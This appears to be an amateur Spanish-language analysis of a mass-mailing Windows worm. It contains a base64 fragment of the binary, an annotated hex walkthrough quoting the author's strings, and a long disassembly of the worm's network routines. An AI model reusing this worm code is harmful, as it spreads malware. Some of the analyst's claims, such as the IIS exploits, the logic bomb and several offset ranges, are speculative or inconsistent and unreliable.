MR0yPDJXMnQyrzLGMtcy6jIwM0kzazN+M8UzyzPhM/Mz/TMPNCs0NjRCNFU0ezSLNMw07DQMNSw1 PjVQNWI1cTWjNbI1vTXWNeM16TUuNjQ2SDZnNm42fTaDNqU2zTbiNvs2Hjc/N1E3VjehN643uDe+ 
N9436DcDOA04EzgbOCE4LTg6OEY4TDhxOMI45Tj4OAY5GTkyOUQ5TzlUOVo5bTl2OYk5jzmnObE5 yzneOfk5DjodOjI6GjskO5k7Gjw1PD88TTxgPGY8eTyPPJ48pTy0PNY85jz1PP08Az0SPRg9Mj1P PWg9hT2PPZU9rD2+PeU99j0OPiI+LD5APlE+Vz5pPnY+kT66PgE/Jj82P1c/dT+jP8g/9j8AAABA AABYAgAAGTAuMDswUjB2MIYwtTC/MMUwyzAyMTcxPTFRMVcxZDFvMXYxfzGZMbQxxDHVMeox7zEA MisyMDI2MkEyVTJgMoEynDKlMqwy3zLvMvYyLjM/M1YzXDNrM4QzjTOrM7Yz0jPpM/AzDDQSNCQ0 OTRLNGE0djSDNIk0njSrNNQ02jTkNPU0+zQCNRY1LjU3NUo1UDV1NXs1kzWpNbA1wTXSNdg14zXx NRQ2RjZrNqY24DYSNzc3fTeIN443tze9N9U36jfvNxA4LTg0OEE4TjhnOHc4fzieOK44tDjVONw4 6DjuOAU5EjkgOSg5LTk8OUQ5UDlYOWQ5bDl5OX85ijmTOao5tjnKOdM55jkiOjM6PTpCOks6Vzpc OmQ6aTpvOnY6ezqBOog6jTqTOpo6nzqlOq06szq6OsA6xzrMOtI62TreOuQ66zrwOvY6/ToCOwg7 DzsWOxw7IzsoOzE7PztHO0w7VTtcO2Q7aTtvO3Y7ezuBO4g7jTuTO5o7nzulO6w7sTu6O8E7yTvO O9Q72zvgO+Y77TvyO/g7/zsEPAo8ETwWPBw8IzwoPC48NTw6PEM8TjxWPFs8YTxoPG08czx6PH88 hTyMPJE8lzyePKM8qTywPLU8uzzCPMc8zTzUPNk83zzmPOs88Tz4PP08Az0KPQ89FT0cPSE9Jz0u PTM9OT1APUU9Sz1SPVc9XT1kPWk9bz12PXs9gT2IPY09kz2aPZ89pT2sPbE9tz2+Pck90D3cPeg9 9D0APhw+Lj5KPnY+yj7QPug+FT8uP0o/XD9tPwBQAAA8AQAAOjBFMFoweDCYMNAw7TD9MAsxGjEp MUQxezGqMbcxzzHlMfQxBjIVMiYyNzJNMmQyijKZMqcyrTLEMs8y1zISMxgzKjMHNCE0KjRANEY0 TzSgNNU04zT6NAs1LTVCNVI1WzVvNXk1pzWyNco10zXcNQ42FDYmNkk2UzZlNoA2izakNtY2EDcw N2I3kDeiN643tDfnN/Y3ETgXOCU4OjhFOFI4CDkOOSo5NzlQOXA5sjm4OcI50zntOfk5AjoTOjc6 PTpGOk46WDphOm06dTp8Oo46lDqdOsQ67ToDOzs7TDtvO4k7mjvQO+07AzwOPE48WTxrPLI8Dj1O PXk9qT3vPfU9Cz4aPis+MT5RPl4+Zj5sPnc+kj6aPqU+5T4RPx0/NT8+P1c/Xz9wP5k/uj/EP/U/ AAAAYAAApAEAABow2jDgMPwwHjE0MU4xVzGbMaExqzHDMWIyezKUMv8yFjMuM14zZDNrM4MzlDOa M6IzsTPTM9kz3zPuM/4zBDQPNDE0NzRCNEg0VjReNGU0ajRwNIY0jTSUNK80ujTANNI03zTnNPY0 AjUpNT41RjVSNVo1aTV2NXw1hzWQNZ01ozWoNa41tDW5Nb818jX5NQQ2ITZuNpM2uzbENsk2zzbW Nts26jbwNvw2BDcJNyk3NTdYN203eDeGN5A3njeoN7M3vjfcN+E35zfyN/g3CTgVOBo4OzhGOEs4 UjhXOF04YziBOJc4ozitOLc4zzjrOPo4BDkZOSA5RjlMOVs5ZDl2OYA5kjmkOao5tTnFOeU59DkA OgY6EDovOoc6lTrGOgY7DjsWOyg7ODs+O207hjujO7w7AjwTPCE8Ljw5PEA8XzxxPH88ljycPKI8 
uTzHPNw84TzmPOw8+DwGPSs9MT15PZE9lz2uPeM98D0GPhU+Vj5cPnI+eD6BPqM+sz67PtQ+Gz8j Pzs/Qj9NP1Q/ej+FP5Q/rD+3P+4/AAAAcAAAmAAAABMwdjB+MJcwnTCiMMcwzTDgMO4w9TD7MAEx BzEgMScxNDFLMWQxajF+MZgxqDHRMSMyQjJgMnQykzKxMuoyATMZMyUzNzNJM3QzezODM4kzjjOT M8UzyzPRM9cz5jPsM/Iz+DP+MwQ0EjQaNCA0KzQ4NEA0TjRTNFg0XTRoNHU0fzSUNKA0pjTINNo0 NjVSNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA= --====_ABC1234567890DEF_==== --------------9320CF73DE613805C122C17B-- --------------9A3F1BA411407BCA09D153B0-- #################################TERMINA################################# [ANALISIS HEXADECIMAL] 1.- 00000040 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468 - 00000070 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000 Este programa no corre en modo de DOS 2.- 000001d0 2e74 6578 7400 0000 5665 0000 0010 0000 - 00000290 0000 0000 4000 0042 0000 0000 0000 0000 Iniciado de subrutina para alocacion de texto en el cuerpo del virus 3.- 000002a0 - 00000ff0 Rutina de cargado de buffer escondida por compilador 4.- 00001000 - 00007550 Rutina primaria escondida por compilador, determinacion de memoria y Seguimiento de errores. MITAD DEL VIRUS 5.- 00007560 - 00007ff0 Rutina de cargado de buffer comun en programas de C. 
6.- 00008350 6283 0000 0000 0000 C102 7374 726E 6370 00008360 7900 9902 6d65 6d73 6574 0000 ba02 7374 Memtest Seguimiento de errores Strings inciales 7.- 00008470 6f69 6e74 6572 0000 3400 4372 6561 7465 - 00008860 7269 7661 7465 5072 6f66 696c 6553 7472 De la linea anterior a esta tenemos seguimiento de errores Creacion de symlinks Atributos de archivo BUscado de archivos Primarios Escritura de Procesos en memoria Obtencion de datos de la maquina Obtencion de interfaces de red Creacion de Threaths Cerrado de recursos Buscado de recursos Creacion de nuevos recursos Obtencion de filas de borrado de archivos Lineas de sustitucion de archivos Destruccion de Procesos y de archivos 8.- 00008870 696e 6741 0000 4b45 524e 454c 3332 2e64 00008920 5049 3332 2e64 6c6c 0000 0000 0000 0000 PRIMERA PARTE CRITICA DEL VIRUS Buscado de sentencias a kernel 32 para su sobreescritura asi como implementacion de llaves Entrada en ADVAPI312.DLL 9.- 00008930 0000 0000 0000 0000 0000 0000 0000 0000 - 00007ff0 0000 0000 0000 0000 0000 0000 0000 0000 Cargado de buffer encriptado por compilador Inicio de la subrutina 10.- 00008000 d888 0000 0a89 0000 f888 0000 e888 0000 - 00008340 8a83 0000 8083 0000 7683 0000 6c83 0000 Encriptado por compilador Inicia la nueva carga de el Kernel32.dll para entrar en registros.Mediante Regedit 11.- 00008360 7900 9902 6d65 6d73 6574 726c 656e 0000 - 00008920 5049 3332 2e64 6c6c 0000 0000 0000 0000 Repeticion de la rutina tratada en el numero 7 con mas variables para edicion de registros y permanencia del virus en memoria. 12.- 00008930 0000 0000 0000 0000 0000 0000 0000 0000 - 00009000 0000 0000 0000 0000 0000 0000 0000 0000 Buffer loaded Esconida por compilador. 
SEGUNDA PARTE CRITICA 13.- 00009010 2e00 0000 5379 7374 656d 5c43 7572 7265 - 000095d0 706c 6f72 6572 5c41 6476 616e 6365 6400 Creacion de Readme.exe asi como de su implantacion en el mail Buscado de subrutinas de internet explorer Buscado de subrutinas de Windows NT Buscado de subrutinas de Windows 9.X BUscado de creadores de codigo hexadecimal para redaccion de el readme.exe al correo electronico Edicion de Windows Current version explorer advanded Mas rutinas......... TERCERA PARTE CRITICA DEL VIRUS 14.- 000095e0 256c 7300 5c5c 2573 0000 0000 256c 6420 - 0000a400 6500 0000 5c5c 0000 6f63 7465 7400 0000 Es aqui donde encontramos las exploits a IIS asi como las entradas en memoria, lo que escribira el virus en caso de ser ejecutado y demas Usado de los MAPI [MUY IMPORTANTE] Tambien es aqui donde encontramos la cadena que nos dice su origen y contra que va este virus. ||||||fuck USA Government|||||| ||||||fuck PoizonBOx|||||| ||||||contact: sysadmcn@yahoo.com.cn|||||| Entradas en microsoft Internet explorer Entradas en microsoft outlook Edicion de Admin.dll Busqueda del mismo en posibles arreglos de discos c:, e:, f:, etc. 
    Entries in the output octets of Explorer; replacement of kernel32.exe by Readme.exe (the author's reading).
15.- 0000a410 - 0000aff0
    Hidden by the compiler; buffer loaded. (Zero padding up to the next section.)
16.- 0000b000 0000 0000 44b9 211f 0400 0000 0000 0300 - 0000cd00 ffff ffff ffff 444f 2800 0000 2000 0000
    Setting of the internal clock. Possible purpose: a logic bomb. (Speculation on the author's part; no date-triggered payload appears in the listing.)
17.- 0000ce80 0100 3001 0000 0500 5041 4444 494e 4758 0000cff0 5850 4144 4449 4e47 5041 4444 494e 4758
    THE MAIN STRING, XPADDINGPADDINGX. (The repeated 'PADDINGXXPADDINGPADDING' text is filler that the Microsoft linker writes between sections; it is neither code nor worm data, only one more sign of a Visual C++ build.)
18.- 0000d000 0010 0000 3401 0000 2530 4330 5130 5f30 - 0000da30 c834 da34 3635 5235 0000 0000 0000 0000
    Closing of routines and restart of processes. (Read as PE structures this is the base relocation table: page RVA 00001000, block size 00000134, then 16-bit entries 3025, 3043, 3051, 305f ... whose high nibble 3 means IMAGE_REL_BASED_HIGHLOW. It holds no code, only the fix-ups the loader applies when the image is not mapped at its preferred base.)
19.- 00000000 4d5a 9000 0300 0000 0400 0000 ffff 0000 - START OF PROGRAM
     0000dff0 0000 0000 0000 0000 0000 0000 0000 0000 - END OF PROGRAM
    Complete body of the virus. (4d5a is 'MZ', the DOS header signature; the last line at dff0 puts the file size at e000 = 57344 bytes, the figure given in the infection details.)

[VIRUS SOURCE CODE]
+[DEBUGGER SOURCE]
##############BEGIN###################
36171000 36171000 model flat 36171000 36171000 ; ═══════════════════════════════════════════════════════════════════════════ 36171000 36171000 ; Segment type: Pure code 36171000 _text segment para public 'CODE' use32 36171000 assume cs:_text 36171000 ;org 36171000h 36171000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing 36171000 36171000 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171000 36171000 ; This worm seems to be written in some HLL, probably C. This can be evidenced by the 36171000 ; way the stack frame is set up within the subroutines.
36171000 ; Attributes: bp-based frame 36171000 36171000 sub_36171000 proc near ; CODE XREF: sub_36175AA9+49p 36171000 36171000 var_74C = word ptr -74Ch 36171000 var_749 = byte ptr -749h 36171000 var_34C = word ptr -34Ch 36171000 var_34A = byte ptr -34Ah 36171000 var_349 = byte ptr -349h 36171000 var_348 = word ptr -348h 36171000 var_346 = word ptr -346h 36171000 var_344 = word ptr -344h 36171000 var_342 = word ptr -342h 36171000 var_340 = byte ptr -340h 36171000 var_140 = dword ptr -140h 36171000 var_13C = dword ptr -13Ch 36171000 var_3C = byte ptr -3Ch 36171000 var_2C = byte ptr -2Ch 36171000 var_1C = word ptr -1Ch 36171000 var_1A = word ptr -1Ah 36171000 var_18 = dword ptr -18h 36171000 var_C = dword ptr -0Ch 36171000 var_4 = dword ptr -4 36171000 arg_0 = dword ptr 8 36171000 arg_4 = dword ptr 0Ch 36171000 arg_8 = dword ptr 10h 36171000 36171000 push ebp 36171001 mov ebp, esp 36171003 sub esp, 74Ch 36171009 push ebx 3617100A push esi 3617100B push edi 3617100C xor edi, edi 3617100E push 20Ch 36171013 lea eax, [ebp-34Ch] 36171019 push edi 3617101A push eax 3617101B call _memset 36171020 add esp, 0Ch 36171023 call ds:GetCurrentThreadId 36171029 and byte ptr [ebp-349h], 7Fh 36171030 push 1 36171032 pop ebx 36171033 mov [ebp-34Ch], ax 3617103A push ebx 3617103B mov [ebp-34Ah], bl 36171041 call dword_3617AC38 36171047 push edi 36171048 mov [ebp-348h], ax 3617104F call dword_3617AC38 36171055 push edi 36171056 mov [ebp-346h], ax 3617105D call dword_3617AC38 36171063 push edi 36171064 mov [ebp-342h], ax 3617106B call dword_3617AC38 36171071 push dword ptr [ebp+8] 36171074 mov [ebp-344h], ax 3617107B lea eax, [ebp-340h] 36171081 push eax 36171082 call sub_36171289 36171087 pop ecx 36171088 cmp eax, edi 3617108A pop ecx 3617108B jl loc_36171119 36171091 push 0Fh 36171093 lea esi, [ebp+eax-340h] 3617109A call dword_3617AC38 361710A0 mov [esi], ax 361710A3 inc esi 361710A4 push ebx 361710A5 inc esi 361710A6 call dword_3617AC38 361710AC mov [esi], ax 361710AF lea eax, 
[ebp-34Ch] 361710B5 sub esi, eax 361710B7 push 10h 361710B9 inc esi 361710BA lea eax, [ebp-1Ch] 361710BD inc esi 361710BE push edi 361710BF push eax 361710C0 mov [ebp-4], esi 361710C3 call _memset 361710C8 push 10h 361710CA lea eax, [ebp-2Ch] 361710CD push edi 361710CE push eax 361710CF call _memset 361710D4 mov eax, [ebp+0Ch] 361710D7 add esp, 18h 361710DA mov word ptr [ebp-1Ch], 2 361710E0 mov [ebp-18h], eax 361710E3 push 35h 361710E5 call dword_3617AC38 361710EB push edi 361710EC push 2 361710EE push 2 361710F0 mov [ebp-1Ah], ax 361710F4 call dword_3617AC5C 361710FA mov esi, eax 361710FC cmp esi, 0FFFFFFFFh 361710FF jz short loc_36171119 36171101 lea eax, [ebp-1Ch] 36171104 push 10h 36171106 push eax 36171107 push esi 36171108 call dword_3617AC58 3617110E test eax, eax 36171110 jz short loc_36171132 36171112 push esi 36171113 call dword_3617AC3C 36171119 36171119 loc_36171119: ; CODE XREF: sub_36171000+8Bj 36171119 ; sub_36171000+FFj 36171119 push 100h 3617111E push dword ptr [ebp+8] 36171121 push dword ptr [ebp+10h] 36171124 call ds:strncpy 3617112A add esp, 0Ch 3617112D jmp loc_36171277 36171132 ; ─────────────────────────────────────────────────────────────────────────── 36171132 36171132 loc_36171132: ; CODE XREF: sub_36171000+110j 36171132 mov [ebp+arg_4], edi 36171135 36171135 loc_36171135: ; CODE XREF: sub_36171000+256j 36171135 push 8 36171137 lea eax, [ebp+var_C] 3617113A push edi 3617113B push eax 3617113C call _memset 36171141 add esp, 0Ch 36171144 lea eax, [ebp+var_C] 36171147 mov [ebp+var_C], 1Eh 3617114E mov [ebp+var_13C], esi 36171154 push eax 36171155 lea eax, [ebp+var_140] 3617115B push edi 3617115C push eax 3617115D push edi 3617115E push edi 3617115F mov [ebp+var_140], ebx 36171165 call dword_3617AC40 3617116B cmp eax, edi 3617116D jz loc_3617124F 36171173 cmp eax, 0FFFFFFFFh 36171176 jz loc_3617124F 3617117C lea eax, [ebp+var_140] 36171182 push eax 36171183 push esi 36171184 call dword_3617AC60 3617118A test eax, eax 3617118C jz loc_3617124F 
36171192 push edi 36171193 lea eax, [ebp+var_34C] 36171199 push [ebp+var_4] 3617119C push eax 3617119D push esi 3617119E call dword_3617AC48 361711A4 cmp eax, [ebp+var_4] 361711A7 jnz loc_3617124F 361711AD push 10h 361711AF lea eax, [ebp+var_3C] 361711B2 push edi 361711B3 push eax 361711B4 call _memset 361711B9 add esp, 0Ch 361711BC lea eax, [ebp+var_C] 361711BF mov [ebp+var_13C], esi 361711C5 mov [ebp+var_140], ebx 361711CB push eax 361711CC push edi 361711CD lea eax, [ebp+var_140] 361711D3 push edi 361711D4 push eax 361711D5 push edi 361711D6 call dword_3617AC40 361711DC cmp eax, edi 361711DE jz short loc_3617124F 361711E0 cmp eax, 0FFFFFFFFh 361711E3 jz short loc_3617124F 361711E5 lea eax, [ebp+var_140] 361711EB push eax 361711EC push esi 361711ED call dword_3617AC60 361711F3 test eax, eax 361711F5 jz short loc_3617124F 361711F7 push edi 361711F8 lea eax, [ebp+var_74C] 361711FE push 400h 36171203 push eax 36171204 push esi 36171205 call dword_3617AC50 3617120B cmp eax, 0Ch 3617120E jb short loc_3617124F 36171210 mov ax, [ebp+var_74C] 36171217 cmp ax, [ebp+var_34C] 3617121E jnz short loc_3617124F 36171220 test [ebp+var_34A], bl 36171226 jz short loc_36171231 36171228 test [ebp+var_749], 80h 3617122F jz short loc_3617125C 36171231 36171231 loc_36171231: ; CODE XREF: sub_36171000+226j 36171231 test [ebp+var_34A], 2 36171238 jnz short loc_3617125C 3617123A push [ebp+arg_8] 3617123D lea eax, [ebp+var_74C] 36171243 push eax 36171244 call sub_3617131A 36171249 pop ecx 3617124A test eax, eax 3617124C pop ecx 3617124D jnz short loc_3617127E 3617124F 3617124F loc_3617124F: ; CODE XREF: sub_36171000+16Dj 3617124F ; sub_36171000+176j ... 
3617124F inc [ebp+arg_4] 36171252 cmp [ebp+arg_4], 4 36171256 jl loc_36171135 3617125C 3617125C loc_3617125C: ; CODE XREF: sub_36171000+22Fj 3617125C ; sub_36171000+238j 3617125C push 100h 36171261 push [ebp+arg_0] 36171264 push [ebp+arg_8] 36171267 call ds:strncpy 3617126D add esp, 0Ch 36171270 push esi 36171271 call dword_3617AC3C 36171277 36171277 loc_36171277: ; CODE XREF: sub_36171000+12Dj 36171277 xor eax, eax 36171279 36171279 loc_36171279: ; CODE XREF: sub_36171000+287j 36171279 pop edi 3617127A pop esi 3617127B pop ebx 3617127C leave 3617127D retn 3617127E ; ─────────────────────────────────────────────────────────────────────────── 3617127E 3617127E loc_3617127E: ; CODE XREF: sub_36171000+24Dj 3617127E push esi 3617127F call dword_3617AC3C 36171285 mov eax, ebx 36171287 jmp short loc_36171279 36171287 sub_36171000 endp 36171287 36171289 36171289 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 36171289 36171289 ; Attributes: bp-based frame 36171289 36171289 sub_36171289 proc near ; CODE XREF: sub_36171000+82p 36171289 36171289 var_204 = byte ptr -204h 36171289 var_2 = word ptr -2 36171289 arg_0 = dword ptr 8 36171289 arg_4 = dword ptr 0Ch 36171289 36171289 push ebp 3617128A mov ebp, esp 3617128C sub esp, 204h 36171292 mov ax, word ptr dot ; "." 
36171298 push esi 36171299 push edi 3617129A push 200h 3617129F push [ebp+arg_4] 361712A2 mov [ebp+var_2], ax 361712A6 lea eax, [ebp+var_204] 361712AC xor edi, edi 361712AE push eax 361712AF call ds:strncpy 361712B5 lea eax, [ebp+var_2] 361712B8 push eax 361712B9 lea eax, [ebp+var_204] 361712BF push eax 361712C0 call ds:strtok 361712C6 add esp, 14h 361712C9 mov [ebp+arg_4], eax 361712CC test eax, eax 361712CE jz short loc_3617130D 361712D0 mov esi, [ebp+arg_0] 361712D3 push ebx 361712D4 361712D4 loc_361712D4: ; CODE XREF: sub_36171289+7Fj 361712D4 push [ebp+arg_4] 361712D7 call _strlen 361712DC push [ebp+arg_4] 361712DF mov ebx, eax 361712E1 lea eax, [esi+1] 361712E4 mov [esi], bl 361712E6 push eax 361712E7 call _strcpy 361712EC lea eax, [ebp+var_2] 361712EF lea esi, [esi+ebx+1] 361712F3 push eax 361712F4 push 0 361712F6 lea edi, [edi+ebx+1] 361712FA call ds:strtok 36171300 add esp, 14h 36171303 mov [ebp+arg_4], eax 36171306 test eax, eax 36171308 jnz short loc_361712D4 3617130A pop ebx 3617130B jmp short loc_36171310 3617130D ; ─────────────────────────────────────────────────────────────────────────── 3617130D 3617130D loc_3617130D: ; CODE XREF: sub_36171289+45j 3617130D mov esi, [ebp+arg_0] 36171310 36171310 loc_36171310: ; CODE XREF: sub_36171289+82j 36171310 and byte ptr [esi], 0 36171313 lea eax, [edi+1] 36171316 pop edi 36171317 pop esi 36171318 leave 36171319 retn 36171319 sub_36171289 endp 36171319 3617131A 3617131A ; ███████████████ S U B R O U T I N E ███████████████████████████████████████ 3617131A 3617131A ; Attributes: bp-based frame 3617131A 3617131A sub_3617131A proc near ; CODE XREF: sub_36171000+244p 3617131A 3617131A var_31C = byte ptr -31Ch 3617131A var_212 = dword ptr -212h 3617131A var_110 = byte ptr -110h 3617131A var_10F = byte ptr -10Fh 3617131A var_10 = dword ptr -10h 3617131A var_C = dword ptr -0Ch 3617131A var_8 = dword ptr -8 3617131A var_4 = dword ptr -4 3617131A arg_0 = dword ptr 8 3617131A arg_4 = dword ptr 0Ch 3617131A 3617131A push 
ebp 3617131B mov ebp, esp 3617131D sub esp, 31Ch 36171323 push ebx 36171324 push esi 36171325 mov esi, [ebp+arg_0] 36171328 push edi 36171329 mov [ebp+var_8], esi 3617132C test byte ptr [esi+3], 0Fh 36171330 jnz short loc_36171382 36171332 cmp word ptr [esi+6], 0 36171337 lea edi, [esi+6] 3617133A mov [ebp+var_C], edi 3617133D jz short loc_36171382 3617133F mov ax, [esi+4] 36171343 lea ebx, [esi+4] 36171346 push eax 36171347 call dword_3617AC34 3617134D mov [ebx], ax 36171350 mov ax, [edi] 36171353 push eax 36171354 call dword_3617AC34 3617135A mov [edi], ax 3617135D mov ax, [esi+8] 36171361 push eax 36171362 call dword_3617AC34 36171368 mov [esi+8], ax 3617136C mov ax, [esi+0Ah] 36171370 push eax 36171371 call dword_3617AC34 36171377 mov [esi+0Ah], ax 3617137B xor eax, eax 3617137D cmp [edi], ax 36171380 jnz short loc_36171389 36171382 36171382 loc_36171382: ; CODE XREF: sub_3617131A+16j 36171382 ; sub_3617131A+23j 36171382 xor eax, eax 36171384 jmp loc_36171489 36171389 ; ─────────────────────────────────────────────────────────────────────────── 36171389 36171389 loc_36171389: ; CODE XREF: sub_3617131A+66j 36171389 add esi, 0Ch 3617138C cmp [ebx], ax 3617138F mov [ebp+arg_0], eax 36171392 jbe short loc_361713E6 36171394 jmp short loc_36171398 36171396 ; ─────────────────────────────────────────────────────────────────────────── 36171396 36171396 loc_36171396: ; CODE XREF: sub_3617131A+C5j 36171396 xor eax, eax 36171398 36171398 loc_36171398: ; CODE XREF: sub_3617131A+7Aj 36171398 mov [ebp+var_10], eax 3617139B mov [ebp+var_4], eax 3617139E mov al, byte_3617A414 361713A3 push 3Fh 361713A5 mov [ebp+var_110], al 361713AB pop ecx 361713AC xor eax, eax 361713AE lea edi, [ebp+var_10F] 361713B4 repe stosd 361713B6 stosw 361713B8 stosb 361713B9 lea eax, [ebp+var_4] 361713BC push eax 361713BD lea eax, [ebp+var_10] 361713C0 push eax 361713C1 lea eax, [ebp+var_110] 361713C7 push eax 361713C8 push esi 361713C9 push [ebp+var_8] 361713CC call sub_36171540 361713D1 add esi, 
eax 361713D3 add esp, 14h 361713D6 movzx eax, word ptr [ebx] 361713D9 inc [ebp+arg_0] 361713DC cmp [ebp+arg_0], eax 361713DF jl short loc_36171396 361713E1 mov edi, [ebp+var_C] 361713E4 xor eax, eax 361713E6 361713E6 loc_361713E6: ; CODE XREF: sub_3617131A+78j 361713E6 xor ebx, ebx 361713E8 cmp [edi], ax 361713EB mov [ebp+arg_0], eax 361713EE jbe loc_36171486 361713F4 361713F4 loc_361713F4: ; CODE XREF: sub_3617131A+166j 361713F4 lea eax, [ebp+var_31C] 361713FA push eax 361713FB push esi 361713FC push [ebp+var_8] 361713FF call sub_3617158F 36171404 add esp, 0Ch 36171407 add esi, eax 36171409 push [ebp+var_212] 3617140F call dword_3617AC34 36171415 mov [ebp+var_4], eax 36171418 mov al, byte_3617A414 3617141D push 3Fh 3617141F mov [ebp+var_110], al 36171425 pop ecx 36171426 xor eax, eax 36171428 lea edi, [ebp+var_10F] 3617142E repe stosd 36171430 stosw 36171432 stosb 36171433 lea eax, [ebp+var_110] 36171439 push eax 3617143A lea eax, [ebp+var_212+2] 36171440 push eax 36171441 push [ebp+var_8] 36171444 call sub_3617148E 36171449 add esp, 0Ch 3617144C test ebx, ebx 3617144E jz short loc_36171458 36171450 movzx eax, word ptr [ebp+var_4] 36171454 cmp ebx, eax 36171456 jle short loc_36171474 36171458 36171458 loc_36171458: ; CODE XREF: sub_3617131A+134j 36171458 movzx ebx, word ptr [ebp+var_4] 3617145C lea eax, [ebp+var_110] 36171462 push 100h 36171467 push eax 36171468 push [ebp+arg_4] 3617146B call ds:strncpy 36171471 add esp, 0Ch 36171474 36171474 loc_36171474: ; CODE XREF: sub_3617131A+13Cj 36171474 mov eax, [ebp+var_C] 36171477 inc [ebp+arg_0] 3617147A movzx eax, word ptr [eax] 3617147D cmp [ebp+arg_0], eax 36171480 jl loc_361713F4 36171486 36171486 loc_36171486: ; CODE XREF: sub_3617131A+D4j 36171486 push 1 36171488 pop eax 36171489 36171489 loc_36171489: ; CODE XREF: sub_3617131A+6Aj 36171489 pop edi 3617148A pop esi 3617148B pop ebx 3617148C leave 3617148D retn 3617148D sub_3617131A endp 3617148D 3617148E 3617148E ; ███████████████ S U B R O U T I N E 
███████████████████████████████████████ 3617148E 3617148E ; Attributes: bp-based frame 3617148E 3617148E sub_3617148E proc near ; CODE XREF: sub_3617131A+12Ap 3617148E ; sub_36171540+10p ... 3617148E 3617148E var_204 = byte ptr -204h 3617148E var_203 = byte ptr -203h 3617148E var_4 = dword ptr -4 3617148E arg_0 = dword ptr 8 3617148E arg_4 = dword ptr 0Ch 3617148E arg_8 = dword ptr 10h 3617148E 3617148E push ebp 3617148F mov ebp, esp 36171491 sub esp, 204h 36171497 mov al, byte_3617A414 3617149C push ebx 3617149D push esi 3617149E push edi 3617149F push 7Fh 361714A1 mov [ebp+var_204], al 361714A7 pop ecx 361714A8 xor eax, eax 361714AA lea edi, [ebp+var_203] 361714B0 mov ebx, [ebp+arg_8] 361714B3 repe stosd 361714B5 stosw 361714B7 test ebx, ebx 361714B9 stosb 361714BA jnz short loc_361714C2 361714BC lea ebx, [ebp+var_204] 361714C2 361714C2 loc_361714C2: ; CODE XREF: sub_3617148E+2Cj 361714C2 and [ebp+arg_8], 0 361714C6 and [ebp+var_4], 0 361714CA mov esi, [ebp+arg_4] 361714CD 361714CD loc_361714CD: ; CODE XREF: sub_3617148E+61j 361714CD ; sub_3617148E+6Ej ... 
